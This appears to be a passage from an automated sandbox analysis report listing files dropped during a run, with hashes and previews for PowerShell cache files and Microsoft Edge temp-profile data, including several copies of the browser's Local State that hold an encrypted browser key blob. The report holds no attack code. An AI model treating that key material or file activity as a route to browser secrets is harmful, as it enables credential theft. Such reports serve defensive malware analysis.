                                                                              Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.u.k.T.A.t.m.z.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.a.c.y.A.c.f.

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):47721
                                                                              Entropy (8bit):5.074691086935296
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:A6F227D3953690EE67C4850E94B7A89A
                                                                              SHA1:D24F88B64A4DF2803E3FBE0727B0B248158294F9
                                                                              SHA-256:A7BB4D3F8E67FA7220A892C02F3C2F87413C325E600EE1D7550ECE1097F2AFDA
                                                                              SHA-512:8C75308E04B306D454D86A84D8D5179085F3D614E449DA5DDAE958948E605900F023C336ECA01B42B1590C873E16B0FFCB41C30585833F840B66F104170EFFED
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:PSMODULECACHE.I....zcL.z..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4umvs3r.fjx.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\7f2f4284-e7b6-4ec1-b005-fddf48ff8a51.tmp

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):1371
                                                                              Entropy (8bit):5.528888726744438
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:FC6E53363D457571F77BA1A2968DAC0A
                                                                              SHA1:EA84E177A801C2EDB1DFEB801AED747600062FC1
                                                                              SHA-256:6A3D33554E8B065A5E57FA793EA2BDECDA1231DB93E90EF857C85B8F31A1CE4F
                                                                              SHA-512:46CD81DA755D221F124DFAC5BD612F2F00B300CF0196A6B1F51E2B43BB5D550FC18F15F8B67D6F186D66E49C1F9E07A60DEAFA1C37F4A7FF727950B051B1EB6D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"profile":{"info_cache":{},"profile_counts_reported":"13386447348432715","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.183.29","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1741973748"},"user_experien

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\83e06840-3230-4788-bed9-afaea43e3785.tmp

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):3297
                                                                              Entropy (8bit):5.591835093547375
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:6D32F695326F69E88B21173D92B38A87
                                                                              SHA1:6ED17C1F3EECF701C6DEFDD52678E5B3EF644301
                                                                              SHA-256:AAE2FC197A8955DDE8912110746561D62154F989E42EBCAE4319CB53C2B031FE
                                                                              SHA-512:C3D6611643593C487A9DEACD93B634A014C5DD9B42912095778E4C6EDDFD4EDD6AD6A5814AE9637F084EA26B9002AB05D8D43D61B9B36F99CD01FE17D717A5D1
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"policy":{"last_statist

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Crashpad\settings.dat

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):280
                                                                              Entropy (8bit):1.781457559330693
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:81DF9F31964B92F3FA798A55AD1BF1C5
                                                                              SHA1:786E39242C529EB89693CDF8E8368FA9F28D85D7
                                                                              SHA-256:6C219AFF67E9A2EC2E2ED907F9BEF2E6E3BCCC6DE40AC01C4C1F4401CE731E38
                                                                              SHA-512:F3B74DB0DAAD944A1E2147A012FE1F4E2903A368887E6F3D5154B400615D79E20391329AB6FF5910A9F745BD8D6597E063B13EBC6E055EA98D3ED89306C11D66
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:sdPC.....................|^P=a.@..D.1...................................................................................................................................................................................................381e0670-e4c7-4d0c-b389-59df81a2cdc6............

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Crashpad\throttle_store.dat

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):20
                                                                              Entropy (8bit):3.6219280948873624
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:level=none expiry=0.

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\Code Cache\js\index-dir\temp-index

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):48
                                                                              Entropy (8bit):2.9972243200613975
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:AC2FE7D332BA6CDA7803E5A32F6E8766
                                                                              SHA1:06B043446B9DA340DC0AF9BCC3A632DAC1326459
                                                                              SHA-256:D4C79E12C1154180946A41A82DA1FF50704FFE39CC01ACB472CAA223B49452F1
                                                                              SHA-512:4E01FE4D004A6A496BC4EB521CBCC2363F39FD8A1DB68B1B305A258477B9387F13B8AABAA496F5D0976117D1660B07575B90490F6DB9C5E875752BA9B2A03CAD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(...$...oy retne...........................'./.

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\Code Cache\js\index-dir\the-real-index (copy)

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:AC2FE7D332BA6CDA7803E5A32F6E8766
                                                                              SHA1:06B043446B9DA340DC0AF9BCC3A632DAC1326459
                                                                              SHA-256:D4C79E12C1154180946A41A82DA1FF50704FFE39CC01ACB472CAA223B49452F1
                                                                              SHA-512:4E01FE4D004A6A496BC4EB521CBCC2363F39FD8A1DB68B1B305A258477B9387F13B8AABAA496F5D0976117D1660B07575B90490F6DB9C5E875752BA9B2A03CAD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(...$...oy retne...........................'./.

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\Code Cache\wasm\index-dir\temp-index

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):48
                                                                              Entropy (8bit):2.9555576533947305
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:90CFE7AAD34FDA6F8D0255F78578C194
                                                                              SHA1:00AD8F6A56D361B55812DBB6E6EEFA7EB17A0FF5
                                                                              SHA-256:516F6BB3DC6E5AF57ECB848B6DC903494CDB85961494C11C67DA04946ED4D69E
                                                                              SHA-512:5C2CE4108F2226B13923BA63FFFC7A4060B78F7BC85A1D2FE20105D1D0F50AA51FF2E9198CA605D41DF9E4A7311B4BEF8A3CE878A059F4CA88447BB9661D480F
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(....y..oy retne...........................'./.

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\Code Cache\wasm\index-dir\the-real-index (copy)

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:90CFE7AAD34FDA6F8D0255F78578C194
                                                                              SHA1:00AD8F6A56D361B55812DBB6E6EEFA7EB17A0FF5
                                                                              SHA-256:516F6BB3DC6E5AF57ECB848B6DC903494CDB85961494C11C67DA04946ED4D69E
                                                                              SHA-512:5C2CE4108F2226B13923BA63FFFC7A4060B78F7BC85A1D2FE20105D1D0F50AA51FF2E9198CA605D41DF9E4A7311B4BEF8A3CE878A059F4CA88447BB9661D480F
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:(....y..oy retne...........................'./.

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\DawnCache\index

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.553120663130604E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:11797D86B46B9E3ADA93F5D3D1C0554F
                                                                              SHA1:5CD636A0A53F43E6EE76F9DD872F1E1A9C536721
                                                                              SHA-256:BA1CE2255B70B4A2F68505A0F71FD0C16A387F5A4FB1CE7031F9B55364BA7438
                                                                              SHA-512:3F6293C00A2D1AAC605C3FA9E9BD7DB7F1EF8151C4D1E9864D92C5F77692F5CD36FA2C124C848AD6725711DE0FA618ECE41902502A6969829870B7416E88840B
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:........................................<*J'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\GPUCache\index

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.47693366977411E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:9E0B939A7AA85E95D13539822641BC9B
                                                                              SHA1:B79BAE54866B7FE507537001CEA9A3FC96668E7A
                                                                              SHA-256:E70EAC4A55443E263940A63C38F3B18ED2161F17BBD47DD3DA8866AFF70DB932
                                                                              SHA-512:3842489EBA55324C029D0569C2529928A4BFBC293A6229BE8BA3C49FDFE8844B4EA69F79BF74BF1EA4D02130FCAC13CD9708A2611BDA1DC7A1BA01EFAFD712DD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:........................................./H'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\README

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):182
                                                                              Entropy (8bit):4.2629097520179995
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:643E00B0186AA80523F8A6BED550A925
                                                                              SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                              SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                              SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Default\arbitration_service_config.json

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):11417
                                                                              Entropy (8bit):5.237554345326078
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                              SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                              SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                              SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\GrShaderCache\index

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.553120663130604E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:41A658DAE933D62491EADE9BE176560E
                                                                              SHA1:1D872039A0A133825E2FDFB2DA594BE267825FF0
                                                                              SHA-256:345A9FDB80D2EBDEFFB01E47637C8D6D985437D38BAE209AB5C8D890C2D4FE84
                                                                              SHA-512:2814C44E470CD93F016108745266B69B8F20347E76DD927A6D0D2F733500FAC758A391F30C131DD5E10D9C0218C98E493FB79E3AB63A5DC132AB0A706507F8BD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..........................................a'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\GraphiteDawnCache\index

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                              Category:dropped
                                                                              Size (bytes):262512
                                                                              Entropy (8bit):9.553120663130604E-4
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:97DE55AB17F4D7AABC709F5BCE31EC54
                                                                              SHA1:799BC9822B6101C077E445C52F464420DAC9D859
                                                                              SHA-256:1BB2D76D3574820F3FB8DBFED8E72F24139F7E16F3F4392C5C3D8EB6E32430C1
                                                                              SHA-512:8BC6990B9881D12AF08B3DC3A047B6E1F7E2336C7C49FE8D4A35102CA1FD49A759C243D43165561993378E98309A40F1E1B08682C644054251250E2A992129B0
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:........................................."d'./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Last Version

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):13
                                                                              Entropy (8bit):2.7192945256669794
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:117.0.2045.47

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Local State (copy)

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:FC6E53363D457571F77BA1A2968DAC0A
                                                                              SHA1:EA84E177A801C2EDB1DFEB801AED747600062FC1
                                                                              SHA-256:6A3D33554E8B065A5E57FA793EA2BDECDA1231DB93E90EF857C85B8F31A1CE4F
                                                                              SHA-512:46CD81DA755D221F124DFAC5BD612F2F00B300CF0196A6B1F51E2B43BB5D550FC18F15F8B67D6F186D66E49C1F9E07A60DEAFA1C37F4A7FF727950B051B1EB6D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"profile":{"info_cache":{},"profile_counts_reported":"13386447348432715","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.183.29","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1741973748"},"user_experien

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Local State~RF38c53.TMP (copy)

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:FC6E53363D457571F77BA1A2968DAC0A
                                                                              SHA1:EA84E177A801C2EDB1DFEB801AED747600062FC1
                                                                              SHA-256:6A3D33554E8B065A5E57FA793EA2BDECDA1231DB93E90EF857C85B8F31A1CE4F
                                                                              SHA-512:46CD81DA755D221F124DFAC5BD612F2F00B300CF0196A6B1F51E2B43BB5D550FC18F15F8B67D6F186D66E49C1F9E07A60DEAFA1C37F4A7FF727950B051B1EB6D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"profile":{"info_cache":{},"profile_counts_reported":"13386447348432715","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.183.29","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1741973748"},"user_experien

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\Local State~RF38d7c.TMP (copy)

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:FC6E53363D457571F77BA1A2968DAC0A
                                                                              SHA1:EA84E177A801C2EDB1DFEB801AED747600062FC1
                                                                              SHA-256:6A3D33554E8B065A5E57FA793EA2BDECDA1231DB93E90EF857C85B8F31A1CE4F
                                                                              SHA-512:46CD81DA755D221F124DFAC5BD612F2F00B300CF0196A6B1F51E2B43BB5D550FC18F15F8B67D6F186D66E49C1F9E07A60DEAFA1C37F4A7FF727950B051B1EB6D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"profile":{"info_cache":{},"profile_counts_reported":"13386447348432715","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.183.29","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1741973748"},"user_experien

                                                                              C:\Users\user\AppData\Local\Temp\chr5152.tmp\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                              Download File
